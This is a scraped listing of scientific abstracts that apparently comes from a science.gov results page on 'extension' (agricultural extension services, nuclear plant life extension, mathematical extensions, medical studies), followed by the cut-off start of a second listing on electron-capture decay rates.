Reformer bar must be controlled carefully. Copyright © 2014 Elsevier Ltd. All rights reserved. 16. Consumer Evaluation of a Vertical Brand Extension in the Lodging Industry: Relationships among Brand Trust, Band Loyalty, Brand Distance, and Brand Extension OpenAIRE Lim, Yu Mi 2013-01-01 Vertical brand extensions have been used as popular strategies in the lodging industry. Research on brand extension that is related with brand trust and brand loyalty has been useful in making brand extensions successful. However, previous research focused on aggregated relationships among brand trust, brand loyalty, and brand extension. In addition, it has been found that quality and price distance from a core brand of the brand extension has an impact on the success of the brand extension. ... 17. Transforming the Roles of a Public Extension Agency to Strengthen Innovation: Lessons from the National Agricultural Extension Project in Bangladesh NARCIS (Netherlands) Chowdhury, A.H.; Odame, H.H.; Leeuwis, C. 2014-01-01 Purpose: The rapidly evolving nature of agricultural innovation processes in low-income countries requires agricultural extension agencies to transform the classical roles that previously supported linear information dissemination and adoption of innovation. In Bangladesh, strengthening agricultural 18. Type I Gaucher disease: extraosseous extension of skeletal disease International Nuclear Information System (INIS) Poll, L.W.; Koch, J.A.; Moedder, U.; Dahl, S. vom; Haeussinger, D.; Sarbia, M.; Niederau, C. 2000-01-01 Objective. To investigate the frequency and morphology of extraosseous extension in patients with Gaucher disease type I.Design and patients. MRI examinations of the lower extremities were analyzed in 70 patients with Gaucher disease type I. Additionally, the thoracic spine and the midface were investigated on MRI in two patients.Results. Four cases are presented in which patients with Gaucher disease type I and severe skeletal involvement developed destruction or protrusion of the cortex with extraosseous extension into soft tissues. In one patient, Gaucher cell deposits destroyed the cortex of the mandible and extended into the masseter muscle. In the second patient, multiple paravertebral masses with localized destruction of the cortex were apparent in the thoracic spine. In the third and fourth patient, cortical destruction with extraosseous tissue extending into soft tissues was seen in the lower limbs.Conclusions. Extraosseous extension is a rare manifestation of Gaucher bone disease. While an increased risk of cancer, especially hematopoietic in origin, is known in patients with Gaucher disease, these extraosseous benign manifestations that may mimic malignant processes should be considered in the differential diagnosis of extraosseous extension into soft tissues. A narrow neck of tissue was apparent in all cases connecting bone and extraosseous extensions. (orig.) 19. Melatonin and cortisol rhythm in patients with extensive nasal polyposis. Science.gov (United States) Fidan, Vural; Alp, Hamit Hakan; Kalkandelen, Sadettin; Cingi, Cemal 2013-01-01 Extensive nasal polyposis is an inflammatory disease which effects 1%-4% of normal population. The mechanism of its formation and the circadian rhythm of cortisol and melatonin in ENP have not investigated. Salivary levels of melatonin and cortisol were measured by radioimmunoassay in 31 patients with extensive nasal polyposis and in 27 control subjects matched for age and gender. In both groups none of the subjects did not have obstructive sleep apnea. The baseline and the peak levels of salivary melatonin in the extensive nasal polyposis group were significantly lower than in the control group (pmelatonin between the study and control groups (p>0.05). The highest values of melatonin were recorded at 04:00 h in both the study and control groups. The amplitude and the 24 h mean levels of salivary cortisol in the extensive nasal polyposis group were significantly lower than in the control group (pmelatonin and cortisol were found to be disrupted in patients with extensive nasal polyposis. These results may be applicable as therapeutic tools in the future and melatonin drugs might be useful in the therapy of nasal polyposis like cortisol drugs. Crown Copyright © 2013. Published by Elsevier Inc. All rights reserved. 20. Nuclear power plants life extension and decommissioning its economic aspects International Nuclear Information System (INIS) Watanabe, Yoshiaki 1994-06-01 In USA where the development of nuclear power was started early, the life of nuclear power plants expires successively around the turn of century, and the serious hindrance to electric power supply is feared. Therefore, the research for extending 40 year approved period of operation is in progress. By the extension of life of nuclear power plants, huge cost reduction is estimated as compared with the construction of new plants. However, due to the rise of the cost for the life extension, there were the cases of forced decommissioning. In this book, the present state of the life extension of nuclear power stations, the economical assessment and analysis of the life extension by DOE, the economical assessment by MIDAS method of Electric Power Research Institute, the economical assessment by cost-benefit method of Northern States Power Co., the assessment of the long term operation possibility of nuclear power stations, the economical assessment system for the life extension in Japan, the present state of the decommissioning of nuclear power stations and that in USA, Canada and Europe, the assessment of the decommissioning cost by OECD/NEA, and the decommissioning cost for thermal power stations are described. (K.I.) 1. Knowledge and perception of extension workers towards ict utilization in agricultural extension service delivery in Gazipur district of Bangladesh Directory of Open Access Journals (Sweden) F.A. Prodhan 2014-12-01 Full Text Available The primary purpose of the study was to assess the extent of knowledge and perception of extension workers towards ICT utilization and to determine the relationship between the selected characteristics of the respondents and knowledge and perception of extension workers towards ICT utilization in extension service delivery. The study was conducted in Gazipur district and comprised proportionate random sample of 90 extension workers from five upazila of Gazipur district. A pre-tested interview schedule was used to collect data from the respondents. To measure the knowledge on ICT utilization 35 statements were selected regarding 7 ICT with five possible answer of each tools and a score of one was given to the right answer and zero to the wrong answer alternatively to measure the perception of the respondents rated each of 10 statements ICT utilization in agriculture on a 5-point Likert type scale and the total of these ratings formed perception index. The result of the study showed that out of seven ICT tools the knowledge of extension workers was highest in case of MS Word this was followed by internet/ web service and the lowest knowledge was found in case of Geographical Information System. It is observed that an overwhelming majority (88.9% of agricultural extension workers in the study area had low to medium knowledge towards ICT utilization. Findings reveal that the respondents had top most perception on the ICT utilization in respect of ‘Extension work can be greatly enhanced by ICT’ followed by on ‘The benefits of ICT use outweigh the financial burden involved’. The result also indicated that more than fourth-fifth (84.4% of the respondents had medium to high perception towards ICT utilization. There were significant relationship between service experience and use of the information sources of the respondents with their knowledge towards ICT utilization conversely innovativeness, cosmopoliteness and job satisfaction of the 2. Extensions to the coupled chemical equilibria and migration code CHEQMATE International Nuclear Information System (INIS) Haworth, A.; Sharland, S.M.; Tasker, P.W.; Tweed, C.J. 1988-08-01 The CHEQMATE program was developed to model the evolution of spatially inhomogeneous aqueous chemical systems. The original CHEQMATE models one-dimensional diffusion and electromigration of ionic species with chemical equilibration provided by the geochemical program PHREEQE. CHEQMATE has principally been used to study the evolution of the chemical environment in and around a nuclear waste repository. In this paper, we describe extensions to CHEQMATE to increase the range of situations that can be modelled. These extensions are the addition of advection of species in a constant groundwater flow, the facility to model migration of species through a series of media with different transport properties and migration in a spherical geometry which allows investigation of dilution effects. For each extension, we describe the alterations in the transport part of the code and consider how the model is set up. An example of a problem using the different versions is given. (author) 3. Life extension of boilers using weld overlay protection Energy Technology Data Exchange (ETDEWEB) Lai, G.; Hulsizer, P. [Welding Services Inc., Norcross, GA (United States); Brooks, R. [Welding Services Inc., Welding Services Europe, Spijkenisse (Netherlands) 1998-12-31 The presentation describes the status of modern weld overlay technology for refurbishment, upgrading and life extension of boilers. The approaches to life extension of boilers include field overlay application, shop-fabricated panels for replacement of the worn, corroded waterwall and shop-fabricated overlay tubing for replacement of individual tubes in superheaters, generating banks and other areas. The characteristics of weld overlay products are briefly described. Also discussed are successful applications of various corrosion-resistant overlays for life extension of boiler tubes in waste-to-energy boilers, coal-fired boilers and chemical recovery boilers. Types of corrosion and selection of weld overlay alloys in these systems are also discussed. (orig.) 14 refs. 4. Computing Preferred Extensions for Argumentation Systems with Sets of Attacking DEFF Research Database (Denmark) Nielsen, Søren Holbech; Parsons, Simon 2006-01-01 The hitherto most abstract, and hence general, argumentation system, is the one described by Dung in a paper from 1995. This framework does not allow for joint attacks on arguments, but in a recent paper we adapted it to support such attacks, and proved that this adapted framework enjoyed the same...... formal properties as that of Dung. One problem posed by Dung's original framework, which was neglected for some time, is how to compute preferred extensions of the argumentation systems. However, in 2001, in a paper by Doutre and Mengin, a procedure was given for enumerating preferred extensions...... for these systems. In this paper we propose a method for enumerating preferred extensions of the potentially more complex systems, where joint attacks are allowed. The method is inspired by the one given by Doutre and Mengin.... 5. Routing protocol extension for resilient GMPLS multi-domain networks DEFF Research Database (Denmark) Manolova, Anna Vasileva; Ruepp, Sarah Renée; Romeral, Ricardo 2010-01-01 This paper evaluates the performance of multi-domain networks under the Generalized Multi-Protocol Label Switching control framework in case of a single inter-domain link failure. We propose and evaluate a routing protocol extension for the Border Gateway Protocol, which allows domains to obtain...... as survivability mechanism in case of single link failure, and employing proper failure notification mechanisms for routing of future connection requests under routing protocol re-convergence. Via simulations we illustrate the benefits of utilizing the proposed routing protocol extension for networks employing...... two Autonomous System disjoint paths and use them efficiently under failure conditions. Three main applications for the protocol extension are illustrated: reducing traffic loss on existing connections by xploiting pre-selected backup paths derived with our proposal, applying multi-domain restoration... 6. Life Extension of Aging High Level Waste (HLW) Tanks International Nuclear Information System (INIS) The Double Shell Tanks (DSTs) play a critical role in the Hanford High-Level Waste Treatment Complex, and therefore activities are underway to protect and better understand these tanks. The DST Life Extension Program is focused on both tank life extension and on evaluation of tank integrity. Tank life extension activities focus on understanding tank failure modes and have produced key chemistry and operations controls to minimize tank corrosion and extend useful tank life. Tank integrity program activities have developed and applied key technologies to evaluate the condition of the tank structure and predict useful tank life. Program results to date indicate that DST useful life can be extended well beyond the original design life and allow the existing tanks to fill a critical function within the Hanford High-Level Waste Treatment Complex. In addition the tank life may now be more reliably predicted, facilitating improved planning for the use and possible future replacement of these tanks 7. Cellular potts models multiscale extensions and biological applications CERN Document Server Scianna, Marco 2013-01-01 A flexible, cell-level, and lattice-based technique, the cellular Potts model accurately describes the phenomenological mechanisms involved in many biological processes. Cellular Potts Models: Multiscale Extensions and Biological Applications gives an interdisciplinary, accessible treatment of these models, from the original methodologies to the latest developments. The book first explains the biophysical bases, main merits, and limitations of the cellular Potts model. It then proposes several innovative extensions, focusing on ways to integrate and interface the basic cellular Potts model at the mesoscopic scale with approaches that accurately model microscopic dynamics. These extensions are designed to create a nested and hybrid environment, where the evolution of a biological system is realistically driven by the constant interplay and flux of information between the different levels of description. Through several biological examples, the authors demonstrate a qualitative and quantitative agreement with t... 8. Generalized ensemble theory with non-extensive statistics Science.gov (United States) Shen, Ke-Ming; Zhang, Ben-Wei; Wang, En-Ke 2017-12-01 The non-extensive canonical ensemble theory is reconsidered with the method of Lagrange multipliers by maximizing Tsallis entropy, with the constraint that the normalized term of Tsallis' q -average of physical quantities, the sum ∑ pjq, is independent of the probability pi for Tsallis parameter q. The self-referential problem in the deduced probability and thermal quantities in non-extensive statistics is thus avoided, and thermodynamical relationships are obtained in a consistent and natural way. We also extend the study to the non-extensive grand canonical ensemble theory and obtain the q-deformed Bose-Einstein distribution as well as the q-deformed Fermi-Dirac distribution. The theory is further applied to the generalized Planck law to demonstrate the distinct behaviors of the various generalized q-distribution functions discussed in literature. 9. On root class residuality of HNN-extensions International Nuclear Information System (INIS) Tieudjo, D. 2004-08-01 A sufficient condition or root-class residuality of HNN-extensions with root-class residual base group is proven; namely if G = -1 1Ht = K, φ> is the HNN-extension with base group A, stable letter t and associated subgroups H and K via the isomorphism φ, then G is root-class residual if group A is root-class residual and there exists a homomorphism σ of group G onto some group of a root-class such that σ is one-to-one on H. For the particular case when H = K and σ is the identical map, it is shown that G is root-class residual if and only if A is root-class residual and subgroup H of A is root-class separable. These results are generalized to multiple HNN-extensions. (author) 10. Analysis of integrated plant upgrading/life extension programs International Nuclear Information System (INIS) McCutchan, D.A.; Massie, H.W. Jr.; McFetridge, R.H. 1988-01-01 A present-worth generating cost model has been developed and used to evaluate the economic value of integrated plant upgrading life extension project in nuclear power plants. This paper shows that integrated plant upgrading programs can be developed in which a mix of near-term availability, power rating, and heat rate improvements can be obtained in combination with life extension. All significant benefits and costs are evaluated from the viewpoint of the utility, as measured in discounted revenue requirement differentials between alternative plans which are equivalent in system generating capacity. The near-term upgrading benefits are shown to enhance the benefit picture substantially. In some cases the net benefit is positive, even if the actual life extension proves to be less than expected 11. AUTHENTIC MATERIALS IN EXTENSIVE READING CLASS AT STAIN PONOROGO Directory of Open Access Journals (Sweden) Dhinuk Puspita Kirana 2013-12-01 Full Text Available It is widely believed that English Foreign Language (EFL learners need to develop their language proficiency by getting so much input. Moreover, students need to be familiarized with the real English us­age where real forms of communication and cultural knowledge are crucially exposed. Teaching through authentic materials will make the learners feel that they are learning a real language which is used by the real native speakers for real communication. incorporating au­thentic materials helps students acquire an effective communicative competence in the language focus. The research intended to describe the implementation of authentic materials in extensive reading class, the problems arise and the students’ responses toward the authen­tic materials in extensive reading class. The design of the research was Descriptive Qualitative method and the research subject was the lecturer of Extensive Reading class and 33 students in B class of the fourth semester of STAIN Ponorogo who took Extensive Read­ing subject. The instruments used were in the form of observation sheet, interview guideline and questionnaire. The implementation of authentic materials in extensive reading class covered some procedures into three main phases namely (1 Pre­ Activity, (2 Main­ Activity and (3 Post­Activity. The activities in main activity are as follows: (a Pre­ Activity; (b Whilst ­Activity; and (3 The language focus stage. There were problems arose during the implementation in terms of complicated planning, more time allocation and some disinterested students. Finally, the students showed significantly positive attitude toward the implementation of authentic materials in extensive reading class. 12. Flexion/extension cervical spine views in blunt cervical Directory of Open Access Journals (Sweden) 2012-06-01 Full Text Available 【Abstract】Objective: To examine the contribution of flexion and extension radiographs in the evaluation of ligamentous injury in awake adults with acute blunt cervical spine trauma, who show loss of cervical lordosis and neck pain. Methods: All patients who presented to our emer-gency department following blunt trauma were enrolled in this study, except those with schiwora, neurological defi-cits or fracture demonstrated on cross-table cervical spine X-rays, and those who were either obtunded or presented after cervical spine surgery. Adequacy of flexion and exten-sion views was checked by the neurosurgery and radiology team members. All these patients underwent cross-table cervical spine view followed by flexion/extension views based on the loss of lordosis on cross-table imaging and the presence of neck pain. Results: A total of 200 cases were reviewed, of whom 90 (45% underwent repeat X-rays because of either inadequate exposure or limited motion. None of the patients with loss of lordosis on cross-table view had positive flexion and extension views of cervical spine for instability. Conclusions: Our results show that in patients who underwent acute radiographic evaluation of blunt cervical spine trauma, flexion and extension views of the cervical spine are unlikely to yield positive results in the presence of axial neck pain and/or loss of cervical lordosis. We can also hypothesize that performing flexion and extension views will be more useful once the acute neck pain has settled. Key words: X-rays; Cervical vertebrae; Lordosis 13. The Attitudes of Agricultural Extension Workers towards the Use of E-Extension for Ensuring Sustainability in the Kingdom of Saudi Arabia Directory of Open Access Journals (Sweden) 2016-09-01 Full Text Available E-extension as a modern mode of communication can be used to improve the effectiveness and efficiency of extension services for agricultural sustainability. E-extension is the delivery of extension services using the Internet and the latest information communication technologies (ICTs, which allow networking, online sharing, and collaboration. Extension workers are a key factor in conducting an effective agricultural extension work plan; therefore, understanding extension workers’ attitudes towards the use of E-extension is important. It has been noted in some studies that, before implementing ICTs, positive attitudes from extension workers is required. This study analyzed the attitudes of extension workers towards the use of E-extension in the Kingdom of Saudi Arabia (KSA. A survey questionnaire was developed comprising statements regarding E-extension and then distributed through the post to all 230 extension workers in the Kingdom with the help of the Ministry of Agriculture. The findings show that extension workers generally had a positive attitude towards the use of E-extension. Significant relationships were found between the overall means of extension workers’ attitudes towards E-extension and their age, years of service, and computer experience. In the light of the results, recommendations drawn are as follows: encouraging extension workers, especially those who are older, to use the E-extension system through exclusive training programs and refresher courses; and incorporating combined workshops for extension workers with few and more years of service to eliminate the generation gap and instigating a better understanding of the E-extension system. 14. A Temporal Extension to Traditional Empirical Orthogonal Function Analysis DEFF Research Database (Denmark) Nielsen, Allan Aasbjerg; Hilger, Klaus Baggesen; Andersen, Ole Baltazar 2002-01-01 This paper describes the application of temporal maximum autocorrelation factor analysis to global monthly mean values of 1996-1997 sea surface temperature (SST) and sea surface height (SSH) data. This type of analysis can be considered as an extension of traditional empirical orthogonal function...... (EOF) analysis, which provides a non-temporal analysis of one variable over time. The temporal extension proves its strength in separating the signals at different periods in an analysis of relevant oceanographic properties related to one of the largest El Niño events ever recorded.... 15. Adaptive Learning in Extensive Form Games and Sequential Equilibrium DEFF Research Database (Denmark) Groes, Ebbe; Jacobsen, Hans Jørgen; Sloth, Birgitte 1999-01-01 This paper studies adaptive learning in extensive form games and provides conditions for convergence points of adaptive learning to be sequential equilibria. Precisely, we present a set of conditions on learning sequences such that an assessment is a sequential equilibrium if and only if there is......This paper studies adaptive learning in extensive form games and provides conditions for convergence points of adaptive learning to be sequential equilibria. Precisely, we present a set of conditions on learning sequences such that an assessment is a sequential equilibrium if and only... 16. Flow and breakup in extension of low-density polyethylene DEFF Research Database (Denmark) Rasmussen, Henrik; Fasano, Andrea 2018-01-01 The breakup during the extension of a low-density polyethylene Lupolen 1840D, as observed experimentally by Burghelea et al. (J Non-Newt Fluid Mech 166:1198–1209 2011), was investigated. This was observed during the extension of an circular cylinder with radius R0 = 4 mm and length L0 = 5mm...... the error bars as reported experimentally by Burghelea et al. (J Non-Newt Fluid Mech 166:1198–1209 2011). At low extensional rates, the measurements were considerably above the calculated ones. A very small relative suppression in the surface (0.1%) was required to achieve an agreement with all measurements... 17. Shelf-life extension of fresh chicken through radurisation International Nuclear Information System (INIS) Niemand, J.G.; Van der Linde, H.J. 1982-01-01 The article discusses the shelf-life extension of fresh chicken through radurization. In order to assess the potential of this process on the South African market, a detailed investigation was carried out to determine the shelf-life extension under local conditions. The following aspects were investigated; 1) reduction of bacterial numbers at different radurisation doses; 2) influence of storage temperature on shelf-life and 3) the elimination of Salmonella. Organoleptic testing was carried out on poultry radurised to doses of 3, 5, 7,5 and 10 kGy as well as on non-radurised controls 18. Abortion associated with Chlamydia abortus in extensively reared Iberian sows. Science.gov (United States) Salinas, J; Ortega, N; Borge, C; Rangel, M J; Carbonero, A; Perea, A; Caro, M R 2012-10-01 Reproductive disease was investigated in Iberian pigs on an extensive farrow-to-finish farm in the southwest of Spain. Chlamydia abortus was isolated in cell culture and C. abortus-specific PCR products were detected in placental and fetal tissues. In one batch of 14 sows, the percentage of sera positive for C. abortus specific antibodies increased from 35.7% to 85.7% in the period of 2 weeks following abortion. C. abortus may play a role in abortion in extensively reared Iberian sows. Copyright © 2012 Elsevier Ltd. All rights reserved. 19. Extensions of simple modules for the Witt algebra DEFF Research Database (Denmark) Rian, Khalid The irreducible representations of the Witt algebra $W$ are completely known. A classification of the irreducible $U_\\chi(W)$--modules was first established by Chang and later simplified by Strade. The aim of this article is to give a classification of the extensions of the simple $U_\\chi(W)$--mo......The irreducible representations of the Witt algebra $W$ are completely known. A classification of the irreducible $U_\\chi(W)$--modules was first established by Chang and later simplified by Strade. The aim of this article is to give a classification of the extensions of the simple $U... 20. Canonical extensions of the Johnson homomorphisms to the Torelli groupoid DEFF Research Database (Denmark) Bene, Alex; Kawazumi, Nariya; Penner, Robert 2009-01-01 We prove that every trivalent marked bordered fatgraph comes equipped with a canonical generalized Magnus expansion in the sense of Kawazumi. This Magnus expansion is used to give canonical extensions of the higher Johnson homomorphisms τm , for m 1 , to the Torelli groupoid, and we provide...... a recursive combinatorial formula for tensor representatives of these extensions. In particular, we give an explicit 1-cocycle in the dual fatgraph complex which extends τ2 and thus answer affirmatively a question of Morita and Penner. To illustrate our techniques for calculating higher Johnson homomorphisms... 1. OSPF-TE Extensions for Green Routing in Optical Networks DEFF Research Database (Denmark) Wang, Jiayuan; Ricciardi, S.; Fagertun, Anna Manolova 2012-01-01 This paper proposes extensions to the OSPF-TE protocol to enable green routing in GMPLS-controlled optical networks. Simulation results show a remarkable reduction in CO2 emissions by preferring network elements powered by green energy sources in the connection routing.......This paper proposes extensions to the OSPF-TE protocol to enable green routing in GMPLS-controlled optical networks. Simulation results show a remarkable reduction in CO2 emissions by preferring network elements powered by green energy sources in the connection routing.... 2. On extensions of wavelet systems to dual pairs of frames DEFF Research Database (Denmark) Christensen, Ole; Kim, Hong Oh; Kim, Rae Young 2015-01-01 It is an open problem whether any pair of Bessel sequences with wavelet structure can be extended to a pair of dual frames by adding a pair of singly generated wavelet systems. We consider the particular case where the given wavelet systems are generated by the multiscale setup with trigonometric...... masks and provide a positive answer under extra assumptions. We also identify a number of conditions that are necessary for the extension to dual (multi-) wavelet frames with any number of generators, and show that they imply that an extension with two pairs of wavelet systems is possible. Along the way... 3. Work on the extension of Restaurant No. 1 CERN Multimedia GS Department 2010-01-01 The work on the extension of Restaurant No. 1 will start on 12 April 2010. The section of the terrace currently available will be closed from this date onwards and the south terrace (see drawing) will gradually be made available in its place. Worksite for the extension of Restaurant No. 1. Closure of current terrace on 2 April. Opening of south terrace on 12 April. Opening of second area of terrace at the end of April. Opening of third area of terrace in May. 4. xSPDE: Extensible software for stochastic equations Directory of Open Access Journals (Sweden) Simon Kiesewetter 2016-01-01 Full Text Available We introduce an extensible software toolbox, xSPDE, for solving ordinary and partial stochastic differential equations. The toolbox makes extensive use of vector and parallel methods. Inputs are exceptionally simple, to reduce the learning curve, with default options for all of the many input parameters. The code calculates functional means, correlations and spectra, checks for errors in both time-step and sampling, and provides several choices of algorithm. Most aspects of the code, including the numerical algorithm, have a modular functional design to allow user modifications. 5. Semirigid Cantilever Extension System for Splinting Implants: A Clinical Report Directory of Open Access Journals (Sweden) Raissa Micaella Marcello Machado 2014-01-01 Full Text Available In mandibular edentulous patients, treatment based on immediate loading with rigid splinting in the mandible is well accepted; however, it is cost and time dependent, which sometimes limits this type of rehabilitation. To overcome these problems, the technique of immediate loading using a semirigid splinting extension system has been developed. Its advantages include low cost, technical feasibility, and reduced clinic time. This clinical report presents the applicability and the predictability of semirigid splinting of implants in the mandibular arch of an edentulous patient using a distal extension bar prosthesis system. 6. Natural extensions and entropy of α-continued fractions International Nuclear Information System (INIS) Kraaikamp, Cor; Schmidt, Thomas A; Steiner, Wolfgang 2012-01-01 We construct a natural extension for each of Nakada's α-continued fraction transformations and show the continuity as a function of α of both the entropy and the measure of the natural extension domain with respect to the density function (1 + xy) −2 . For 0 2 /6. We show that the interval (3-√5)/2≤α≤(1+√5)/2 is a maximal interval upon which the entropy is constant. As a key step for all this, we give the explicit relationship between the α-expansion of α − 1 and of α. (paper) 7. Challenges for extension service to render efficient post-transformer ... African Journals Online (AJOL) LPhidza environment. “Sustainability is to leave future generations as many, if not more, opportunities. 7 PhD student, Centre for Sustainable Agriculture, Rural Development and Extension, University of the Free ..... (University of the Free State). THI, N. 2008. Migration of youth to Ho Chi Minh City, Vietnam. PhD Thesis submitted to. 8. Revisiting the quality of Health Extension Workers' training: Case ... African Journals Online (AJOL) admin Background:- Ethiopia has been training community health workers, locally under its program of Health Extension. Workers, in Technical and ... Results:- The study showed that the curriculum for the training had not been revised since it was developed. Shortage .... barrier. I prepared exam questions in English, but some. 9. A Basic Elementary Extension of the Duchet-Meyniel Theorem DEFF Research Database (Denmark) Pedersen, Anders Sune; Toft, Bjarne 2010-01-01$ by $2\\alpha - 2$ when $\\alpha$ is at least 3. In this paper a basic elementary extension of the Theorem of Duchet and Meyniel is presented. This may be of help to avoid dealing with basic cases when looking for more substantial improvements. The main unsolved problem (due to Seymour) is to improve, even... 10. Polymeric liquids in extension: fluid mechanics or rheometry? DEFF Research Database (Denmark) Hassager, Ole; Marin, Jose Martin Roman; Yu, Kaijia 2010-01-01 to be more uniaxial with IA invoked. As a second illustration of the techniques, we simulate the phenomenon of delayed rupture after rapid extension of entangled polymer systems. It is demonstrated that this phenomenon can be explained on the basis of the Doi-Edwards model in terms of a Considere... 11. Greater Awareness--Extension's Key to Program Success. Science.gov (United States) Coward, Raymond T. 1978-01-01 To find why adults do or do not attend extension programs, the author surveyed a sample of families in metropolitan and nonmetropolitan areas of Indiana to determine their perceived educational needs, program priorities, and delivery preferences in the major areas of home economics. Survey results and their implications are discussed. (MF) 12. Journal of Agricultural Extension Vol.17 (2) December, 2013 ISSN ... African Journals Online (AJOL) ONIKOYI (refers to crop and animal husbandry workers), 43 veterinary surgeons and one sociologist. The study was conducted ... veterinarians who were available were interviewed. Data collection was done using a .... organization, such as type of training provided to extension workers, salary decisions, and opportunities for further ... 13. Pythagoras did not coin the word "Philosophia" (By extension and ... African Journals Online (AJOL) The study primarily states that Pythagoras, the classical – Greek Philosopher of C500BC did not coin the word “Philosophia”: By extension, our research hypothesis clearly states, (1) H0: that Pythagoras and classical Greek philosophers never existed (Philops: 1953) particularly they have no historical record but only ... 14. Speciation with gene flow in equids despite extensive chromosomal plasticity DEFF Research Database (Denmark) Jáónsson, Hákon; Schubert, Mikkel; Seguin-Orlando, Andaine 2014-01-01 Significance Thirty years after the first DNA fragment from the extinct quagga zebra was sequenced, we set another milestone in equine genomics by sequencing its entire genome, along with the genomes of the surviving equine species. This extensive dataset allows us to decipher the genetic makeup... 15. Participatory Contact Farmer Selection: Survey of two Extension ... African Journals Online (AJOL) This paper tested individual and group socio-metric nomination of potential contact farmers and compared the nominations with the CFs working in two extension circles. It was shown that only three (3) CFs out of eight (8) in the study appeared on both the individual and group nominations. It was recommended that EAs ... 16. Farmworkers' Irrigation Schools: An Extension Model for Hispanic Farm Laborers. Science.gov (United States) Youmans, David; And Others 1982-01-01 Describes a model for Hispanic farm laborer irrigation schools that was developed, implemented, and evaluated by cooperative extension personnel. Success of the approach was due to attention to critical elements in the model, which is applicable to other adult basic education programs. (JOW) 17. Challenges for extension service to render efficient post-transformer ... African Journals Online (AJOL) LPhidza The public extension service in the Eastern Cape Province is in vital need of revitalization if it is to transform the unproductive smallholder-agriculture sector into a more commercially- orientated sector. The research used a Logical Framework Analysis (LFA) enquiry to determine the problems smallholder farmers face as ... 18. Horava-Lifshitz-like extensions of supersymmetric theories Science.gov (United States) Gomes, M.; Nascimento, J. R.; Petrov, A. Yu.; da Silva, A. J. 2014-12-01 Within the superfield approach, we formulate two different extensions of the Wess-Zumino model and super-QED with Horava-Lifshitz-like additive terms, discuss their quantum properties and calculate lower contributions to the effective action. In the case of the gauge theory, the one-loop effective potential turns out to be gauge independent. 19. Idiopathic extensive peliosis hepatis treated with liver transplantation DEFF Research Database (Denmark) Hyodo, Masanobu; Mogensen, Anne Mellon; Larsen, Peter Nørgaard 2004-01-01 complicating liver cirrhosis. Extensive peliosis with liver cirrhosis is a rare condition. Only two cases, caused by contraceptives and treated by liver transplantation, are reported in the English-language literature. We could find no cause other than alcohol abuse lasting several years in this patient... 20. On the maximum entropy principle in non-extensive thermostatistics OpenAIRE Naudts, Jan 2004-01-01 It is possible to derive the maximum entropy principle from thermodynamic stability requirements. Using as a starting point the equilibrium probability distribution, currently used in non-extensive thermostatistics, it turns out that the relevant entropy function is Renyi's alpha-entropy, and not Tsallis' entropy.
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 2, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4194348156452179, "perplexity": 5682.33720695064}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-26/segments/1529267863100.8/warc/CC-MAIN-20180619154023-20180619174023-00598.warc.gz"}
https://www.science.gov/topicpages/c/capture+decay+rates.html
#### Sample records for capture decay rates 1. Oscillating decay rate in electron capture and the neutrino mass difference Peshkin, Murray 2015-04-01 Reported oscillations in the rate of decay of certain ions by K -electron capture have raised questions about whether and how such oscillations can arise in quantum-mechanical theory and whether they can measure the neutrino mass difference. Here I show that simple principles of quantum mechanics answer some questions and clarify what must be performed theoretically or experimentally to answer some others. The principal result is that quantum mechanics does allow mass-difference-dependent oscillations in principle, but it imposes conditions not obeyed by the approximate dynamical models that have been put forth up to now. In particular, indirect coupling between two neutrino mass channels must be taken into account. What needs to be done experimentally and theoretically is discussed. 2. Radioactive decay speedup at T=5 K: electron-capture decay rate of (7)Be encapsulated in C(60). PubMed Ohtsuki, T; Ohno, K; Morisato, T; Mitsugashira, T; Hirose, K; Yuki, H; Kasagi, J 2007-06-22 The electron-capture (EC) decay rate of (7)Be in C(60) at the temperature of liquid helium (T=5 K) was measured and compared with the rate in Be metal at T=293 K. We found that the half-life of (7)Be in endohedral C(60) ((7)Be@C(60)) at a temperature close to T=5 K is 52.47+/-0.04 d, a value that is 0.34% faster than that at T=293 K. In this environment, the half-life of (7)Be is nearly 1.5% faster than that inside Be metal at room temperature (T=293 K). We then interpreted our observations in terms of calculations of the electron density at the (7)Be nucleus position inside the C(60); further, we estimate theoretically the temperature dependence (at T=0 K and 293 K) of the electron density at the Be nucleus position in the stable center inside C(60). The theoretical estimates were almost in agreement with the experimental observations. 3. Time Modulation of the K-Shell Electron Capture Decay Rates of H-like Heavy Ions at GSI Experiments SciTech Connect Ivanov, A. N.; Kienle, P. 2009-08-07 According to experimental data at GSI, the rates of the number of daughter ions, produced by the nuclear K shell electron capture decays of the H-like heavy ions with one electron in the K shell, such as {sup 140}Pr{sup 58+}, {sup 142}Pm{sup 60+}, and {sup 122}I{sup 52+}, are modulated in time with periods T{sub EC} of the order of a few seconds, obeying an A scaling T{sub EC}=A/20 s, where A is the mass number of the mother nuclei, and with amplitudes a{sub d}{sup EC}approx0.21. We show that these data can be explained in terms of the interference of two massive neutrino mass eigenstates. The appearance of the interference term is due to overlap of massive neutrino mass eigenstate energies and of the wave functions of the daughter ions in two-body decay channels, caused by the energy and momentum uncertainties introduced by time differential detection of the daughter ions in GSI experiments. 4. Measurement of the {beta}{sup +} and Orbital Electron-Capture Decay Rates in Fully Ionized, Hydrogenlike, and Heliumlike {sup 140}Pr Ions SciTech Connect Litvinov, Yu. A.; Geissel, H.; Winckler, N.; Knoebel, R.; Litvinov, S. A.; Scheidenberger, C.; Bosch, F.; Beckert, K.; Brandau, C.; Dimopoulou, C.; Hess, S.; Kozhuharov, C.; Mazzocco, M.; Nociforo, C.; Nolden, F.; Prochazka, A.; Reuschl, R.; Steck, M.; Stoehlker, T.; Trassinelli, M. 2007-12-31 We report on the first measurement of the {beta}{sup +} and orbital electron-capture decay rates of {sup 140}Pr nuclei with the simplest electron configurations: bare nuclei, 